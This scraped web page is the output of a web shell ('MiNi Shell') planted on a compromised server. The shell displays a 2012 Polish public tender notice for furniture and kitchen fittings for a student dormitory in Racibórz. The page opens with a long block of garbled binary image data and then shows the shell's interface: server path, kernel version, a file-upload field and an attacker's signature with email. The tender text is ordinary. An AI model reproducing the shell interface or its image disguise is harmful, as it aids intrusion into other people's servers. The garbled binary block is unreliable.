JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/63687-N-2012.html

<p class="kh_header"><b>Racibórz: dostawa mebli do Domu Studenta Nr 1</b><br>
<b>Numer ogłoszenia: 63687 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa , ul. Słowackiego 55, 47-400 Racibórz, woj. śląskie, tel. 032 4155020, faks 032 4155020 w. 139.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.raciborz.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa mebli do Domu Studenta Nr 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli do Domu Studenta Nr 1 Państwowej Wyższej Szkoły Zawodowej w Raciborzu.   
Opis przedmiotu zamówienia - meble

1.Łóżko pojedyncze z materacem - 68 szt.

Rama łóżka wykonana z profilu zamkniętego o przekroju 40x35x50mm z ścianką 1,5mm,wypełnienie stanowi 11 stalowych płaskowników o wymiarach 20x5mm, dwie nóżki ramyzakończone kółkami z okładziną gumową z hamulcem, dwie nóżki stałe ze ślizgaczem wykonanym z tworzywa sztucznego zapobiegającego zarysowania wykładziny podłogowej. Po bokach oraz z przodu i tyłu relingi zapobiegające zsuwaniu się materaca. Konstrukcja w całości spawana. Rama stelaża łóżka w całości spawana o wymiarach zewnętrznych 905x2005x350mm Materac wkład stanowią 184 sprężyny bonelowe o wysokości 11cm i średnicy 10cm wykonane z wysokogatunkowego drutu o średnicy 2,2mm. Wkład sprężynowy obłożony jest przekładką tapicerską o gr 3mm ; 400gm2 oraz warstwą siatki tapicerskiej i pianką utwardzaną T 25kgm3 poliuretanową o zwiększonej sprężystości.
Pokrowiec materaca wykonany z materiału składającego się w 38% z poliestru 62%
polipropylenu. Pikowany antyalergiczną z watą min 60-90gm2. Materac jest dwustronny. Wymagany certyfikat higieniczności. Kolor profilu zamkniętego: szary lub srebrny.

2. Biurko 100cm x 60 cm x75 cm (h) - 68 szt.

Wszystkie blaty wykonane są z płyty wiórowej trzywarstwowej wg DIN 68765 o grubości min. 25mm pokrytej obustronnie melaminą. Gęstość płyty tej grubości powinna wynosić min. 660 kgm3, a klasa higieniczności E1. Blaty oklejone obrzeżem PVC o grubości 2mm w kolorze płyty. Podstawa i blenda biurka wykonana z płyty wiórowej trzywarstwowej wg DIN 68765 o grubości min. 18mm pokrytej obustronnie melaminą. Gęstość płyty tej grubości powinna wynosić min. 720 kgm3, a klasa higieniczności E1. Krawędzie zabezpieczone obrzeżem PCV gr. 1mm. Blenda biurka połączona z nogą za pomocą śruby oraz zaczepu z gniazdem typu EURO. Stopki zapobiegające niszczeniu się wykładziny - 4 szt.
Atest higieniczny na płytę.

3. Krzesło do biurka - 68 szt.

Nogi i oparcie krzesła wykonane z owalnej rury o wymiarach: 30x15x1,3mm poprzeczki wykonane z rury o średnicy o18x1,5mm.Siedzisko wykonane z gąbki o grubości 30 mm, natomiast oparcie z gąbki o grubości 25 mm. Siedzisko przymocowane do ramy wkrętami M6x20. Krzesło posiada stopki wykonane z tworzywa sztucznego zapobiegające zniszczeniu wykładziny.
- Wysokość całkowita: 800-830 mm.
- Wysokość siedziska: 450-480 mm.
- Szerokość siedziska: 455-485 mm.
- Głębokość siedziska: 390 -420 mm.
- Szerokość całkowita: 500- 560mm.

Siedzisko i oparcie krzesła tapicerowane tkaniną spełniająca poniższe wymagania :
Skład tkaniny 100 poliestr, gramatura 330gm2.
Odporność nitek w tkaninie na przesunięcie w szwie zgodnie z normą PN-EN ISO 13936-2:2005 ( minimum kategoria A).
Odporność na piling zgodnie z normą PN-EN ISO 12945-2:2002( minimum kategoria A).Odporność na ścieranie zgodnie z normą PN-EN ISO 12947-2:2000;AC:2006;PN-EN14465:2005;A1:2007 minimum 100.000 cykli Martindale-a.
Atesty dotyczące krzesła : atest wytrzymałościowy.
Atesty na tkaninę krzesła : raport z badań potwierdzony przez Laboratorium Badań
Chemicznych i Analiz Instrumentalnych.
Kolor tapicerki - czarny
Kolor rury - czarny.

4. Szafa aktowo ubraniowa z półkami i drążkiem 80 cm x 60 cm x 200 cm (h) - 62 szt., 60 cm x 60 cm x 200 cm (h) - 6 szt. (szerokość x głębokość x wysokość)

BOKI : płyta wiórowa trzywarstwowa wg DIN 68765 o grubości min. 18 mm, pokryta
obustronnie melaminą. Gęstość płyty: min. 720 kgm3. Klasa higieniczności E1. Konstrukcja wieńcowa. Boki oklejone PVC 2 mm z czterech stron.
PLECY: kołkowane i klejone z bokami i wieńcami, w kolorze boków z płyty wiórowej
trzywarstwowej wg DIN 68765 występujące w dwóch grubościach: min. 8 mm - pokrytej obustronnie melaminą. Gęstość płyty: min.750 kgm3. Klasa higieniczności E1. Płaszczyzna pleców cofnięta w stosunku do boków o ok. 10 mm.
WIENIEC DOLNY I GÓRNY: płyta wiórowa trzywarstwowa wg DIN 68765 o grubości min. 25mm, pokryta obustronnie melaminą. Gęstość płyty: min. 660 kgm3. Klasa higieniczności E1. Wieniec dolny wyposażony w stopki (w ilości zapewniającej stabilność całej szafy) zapewniające poziomowanie od wewnątrz szafy w zakresie min. 15 mm.Wieńce oklejone PVC 2mm z czterech stron. Korpusy sklejane fabrycznie w całość w prasach, na zautomatyzowanej linii do montażu szaf.
FRONTY
Fronty wykonać z płyty wiórowej trzywarstwowej pokrytej obustronnie melaminą wg DIN 68765 o grubości min. 18 mm. Gęstość płyty min. 720 kgm3. Klasa higieniczności E1. Fronty oklejone PVC 2 mm z czterech stron. Do montażu drzwi zastosować mocne zawiasy, maksymalnie zabezpieczające przed wyłamaniem - typu puszkowego w ilości 3 sztuki na skrzydło. 
PÓŁKI
Półki mocowane do korpusu systemem zapadkowym uniemożliwiającym ich przypadkowe wysunięcie. Dodatkowo w każdej szafie minimum 1 półka konstrukcyjna mocowana za pomocą złącz metalowo-plastikowych w celu zwiększenia sztywności korpusu lub w inny porównywalny sposób. Półki wykonać są z płyty wiórowej trzywarstwowej wg DIN 68765 w grubości min18 mm - pokrytej obustronnie melaminą. Gęstość płyty: min. 720 kgm3. Klasa higieniczności E1. W części aktowej min. cztery półki.
OKUCIA
Szafy aktowo ubraniowe wyposażyć w zamek baskwilowy trzypunktowy z dwoma
kluczykami w tym jeden łamany. W części ubraniowej drążek ubraniowy. Atest higieniczny na płytę.

5. Wieszak ścienny na odzież 50 cm x 2,5 cm x 15 cm (h) - 6 szt.

Wieszak ścienny z płyty wiórowej trzywarstwowej wg DIN 68765 o grubości min. 25mm pokrytej obustronnie melaminą. Gęstość płyty tej grubości powinna wynosić min. 660 kgm3, a klasa higieniczności E1. Krawędzie zabezpieczone z czterech stron. Wyposażony w 5 metalowych potrójnych wieszaków w kolorze aluminium.
Atest higieniczny na płytę.

6. Zlewozmywak jednokomorowy z baterią stojącą - 22 szt.

Zlewozmywak jednokomorowy do zabudowy wykonany z wysokogatunkowej stali szlachetnej. Nierdzewny odporny na wysokie temperatury kwasy i zasady .
Średnica zlewozmywaka 410-422mm gł. 150mm. W komplecie z syfonem oraz zintegrowanym odpływem. 
BATERIA STOJĄCA
Jedno dźwigniowa, wysokociśnieniowa, z obrotową wylewką . Głowica ceramiczna,
dźwignia baterii z otworem . Klasa głośności 1 . Zasięg wylewki 197-240mm wysokość do
wylewki 140-175mm, wysokość do uchwytu 100-140mm. Wężyki zasilające baterię w wodę winny być zintegrowane z istniejącym przyłączem wody.

7. Płyta elektryczna 2 -palnikowa - 22 szt.

Płyta ceramiczna do zabudowy 2 polowa z własnym sterowaniem za pomocą pokręteł w kolorze czarnym. Blat witroceramiczny. Pierwsze pole o średnicy 120-160mm o mocy HILIGHT 1000-1300 W; drugie pole o średnicy 160-200mm i mocy 1600-1800W
Moc całkowita 2600-3200W.


8. Lustro - 30 szt.

Lustro srebrne o gr. 5mm , krawędzie fazowane. Ochronna folia zmniejsza uszkodzenia w przypadku stłuczenia. Lustro do montażu ( na płytki ścienne) za pomocą odpowiedniego kleju montażowego. Krawędzie lustra szlifowane zapobiegające skaleczeniu się przez użytkownika. 
Wymiary: 40 cm x 50 cm (szer. x wys.).

9. Półka ścienna wisząca 100 cm x 30 cm x 40 cm (h) - 68 szt.

Wykonana z płyty wiórowej trzywarstwowej wg DIN 68765 o grubości min. 18 mm, pokryta obustronnie melaminą. Gęstość płyty: min. 720 kgm3. Klasa higieniczności E1. Konstrukcja wieńcowa. Boki oklejone PVC 2 mm. Półka wyposażona w tył, który przylegać będzie do ściany oraz dwa boki zabezpieczające przed spadaniem książek. Całość kołkowana i klejona. Półka wyposażona w uchwyty mocujące na ścianie o dużej wytrzymałości.
Atest higieniczny na płytę.

10. Blat kuchenny z wykończeniami - 30 mb

Blat grubości ok. 3 cm z okleiną typową dla blatów kuchennych - odporną na zabrudzenia, zarysowania  - o łącznej długości 30 mb i głębokości 60 cm (dostosowany do głębokości szafek kuchennych pod zabudowę). Pod blatem wnęka do wstawienia lodówki o wymiarach:
szerokość 55-60 cm, głębokości 55-60 cm, wysokość 80-85 cm (część niezabudowana).
Kolor okleiny blatu - olcha.

11. Szafka kuchenna dolna pod zabudowę zlewu jednokomorowego - 22 szt. 

Korpusy szafek wykonane z płyty wiórowej trzywarstwowej wg DIN 68765 o grubości min. 25mm pokrytej obustronnie melaminą. Klasa higieniczności E1. Krawędzie zabezpieczone z czterech stron obrzeżem o grubości 1mm. Szafki posadowione na nóżkach metalowych kwadratowych 40x40mm, o wysokości min. 120 mm z regulatorem poziomu w zakresie 15mm, umożliwiające poziomowanie szafki, regulator metalowy chromowany. Blat postformingowy  o grubości ok. 30mm z listwą przyblatową. Wnętrze szafki przeznaczone na kosz na śmieci o poj. ok. 35 l. Plecy szafki od wieńca dolnego do połowy wysokości z płyty wiórowej melaminowej o grubości ok. 10 mm. Front wykonać z płyty wiórowej trzywarstwowej pokrytej obustronnie melaminą o grubości min. 18 mm. Klasa higieniczności E1. Front oklejony PVC 2 mm z czterech stron. Do montażu drzwi zastosować mocne zawiasy, maksymalnie zabezpieczające przed wyłamaniem - typu puszkowego w ilości 2 sztuki na skrzydło. 

12. Szafka kuchenna dolna pod zabudowę na płytę grzewczą - 22 szt.

Korpusy szafek wykonane z płyty wiórowej trzywarstwowej wg DIN 68765 o grubości min. 25mm pokrytej obustronnie melaminą. Klasa higieniczności E1. Krawędzie zabezpieczone z czterech stron obrzeżem o grubości 1mm. Szafki posadowione na nóżkach metalowych kwadratowych 40x40mm, o wysokości min. 120 mm z regulatorem poziomu w zakresie 15mm, umożliwiające poziomowanie szafki, regulator metalowy chromowany. Blat postformingowy o grubości ok. 30mm z listwą przyblatową. Tył szafki z płyty wiórowej melaminowanej o grubości ok. 10 mm. Wewnątrz szafki szuflada na sztućce posadowiona na metalowych (łożyskowanych) prowadnicach. Jedna półka z możliwością przestawiania wysokości. Front wykonać z płyty wiórowej trzywarstwowej pokrytej obustronnie melaminą o grubości min. 18 mm. Klasa higieniczności E1. Front oklejony PVC 2 mm z czterech stron. Do montażu drzwi zastosować mocne zawiasy, maksymalnie zabezpieczające przed wyłamaniem - typu puszkowego w ilości 2 sztuki na skrzydło.

13. Szafka kuchenna górna - 22 szt.

Korpusy szafek wykonane z płyty wiórowej trzywarstwowej wg DIN 68765 o grubości min.18mm pokrytej obustronnie melaminą. Klasa higieniczności E1. Krawędzie zabezpieczone z czterech stron obrzeżem o grubości 1mm. Tył szafki z płyty wiórowej melaminowanej o grubości ok. 10 mm. Wewnątrz szafki dwie półki z możliwością przestawienia wysokości. Szafka wyposażona w uchwyty mocujące o dużej wytrzymałości, tak umieszczone aby nie były widoczne na zewnątrz. Wymiary szafki: szer. 60 cm x gł. 30 cm x wys. 72 cm. Front wykonać z płyty wiórowej trzywarstwowej pokrytej obustronnie melaminą o grubości min. 18 mm. Klasa higieniczności E1. Fronty ( 2 skrzydła) oklejone PVC 2 mm z czterech stron. Do montażu drzwi zastosować mocne zawiasy, maksymalnie zabezpieczające przed wyłamaniem - typu puszkowego w ilości 2 sztuki na skrzydło.

Dodatkowe informacje:

- Kolor mebli do pokoi studenckich oraz aneksów kuchennych: olcha lub w podobnym odcieniu.
- Kolor tapicerki krzeseł: czarny
- Otwory widoczne po montażu w meblach, łby śrub i wkrętów powinny być wyposażone w odpowiednie zaślepki w kolorze zbliżonym do koloru płyty
- Drzwi szaf ubraniowo aktowych zamontowane na mocnych zawiasach, maksymalnie zabezpieczających przed wyłamaniem - typu puszkowego w ilości 3 sztuk na skrzydło.
- Półki z możliwością regulacji wysokości mocowania, otwory w odstępach co ok. 10 cm
- Do wszystkich drzwi uchwyty metalowe.
- Wszystkie elementy mebli i siedzisk powinny być przygotowane na intensywne użytkowanie i w związku z tym muszą być wykonane z jakościowo dobrych materiałów, w sposób gwarantujący ich trwałość.
- Przedmiot zamówienia winien zawierać: dostawę, wnoszenie mebli (materiałów) na poszczególne kondygnacje obiektu (od parteru do czwartego piętra) oraz montaż we wskazanym miejscu przez zamawiającego.
- Usunięcie pozostałości typu śmieci, opakowania oraz porządek po zakończonym montażu leży po stronie wykonawcy. 
- Zamawiający dopuszcza udostępnienie pomieszczeń w celu dokonania dokładnych pomiarów z natury oraz oględzin przed złożeniem oferty. Ww czynności można przeprowadzić po uprzednim skontaktowaniu się z zamawiającym w godzinach jego urzędowania. Osoba upoważniona do kontaktu, przedłożono w pkt. VII SIWZ.
- Wykonawca wybrany do realizacji zamówienia, powinien dokonać wizji lokalnej oraz   pomiarów z natury pomieszczeń w Domu Studenta nr 1 przeznaczonych do umeblowania, a w szczególności aneksów kuchennych. Wykonawca przed realizacją zamówienia winien dokonać i ustalić z Zamawiającym dokładne wymiary mebli.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizację co najmniej 1 dostawy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.

Szczegółowy opis wymaganego doświadczenia dla wykonawców:

Tabelaryczny wykaz dostaw w okresie trzech lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie 
( co najmniej jedna dostawa o wartości co najmniej 200.000,00 zł brutto o podobnym zakresie dostawy jak w niniejszym zamówieniu).

Tabela powinna zawierać:
- przedmiot zamówienia,
- wartość wykonanych dostaw (brutto),
- data wykonania dostawy,
- nazwa odbiorcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy i cenowy wg wzoru przedłożonego w SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie można dokonać w przypadku, gdy nastąpią okoliczności, których Zamawiający nie mógł wcześniej przewidzieć przed wszczęciem postępowania dotyczy to przedłużenia terminu realizacji zamówienia. Przedłużenie terminu może nastąpić za zgodą obu stron tj. Zamawiającego i Wykonawcy, podając przyczynę przedłużenia terminu realizacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pwsz.raciborz.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać również bezpośrednio w siedzibie zamawiającego (w pokoju nr 140 ). Na wniosek Wykonawcy Zamawiający prześle Specyfikację bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 10:00, miejsce: Państwowa Wyższa Szkoła Zawodowa, ul. Słowackiego 55, 47-400 Racibórz, Sekretariat Kanclerza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com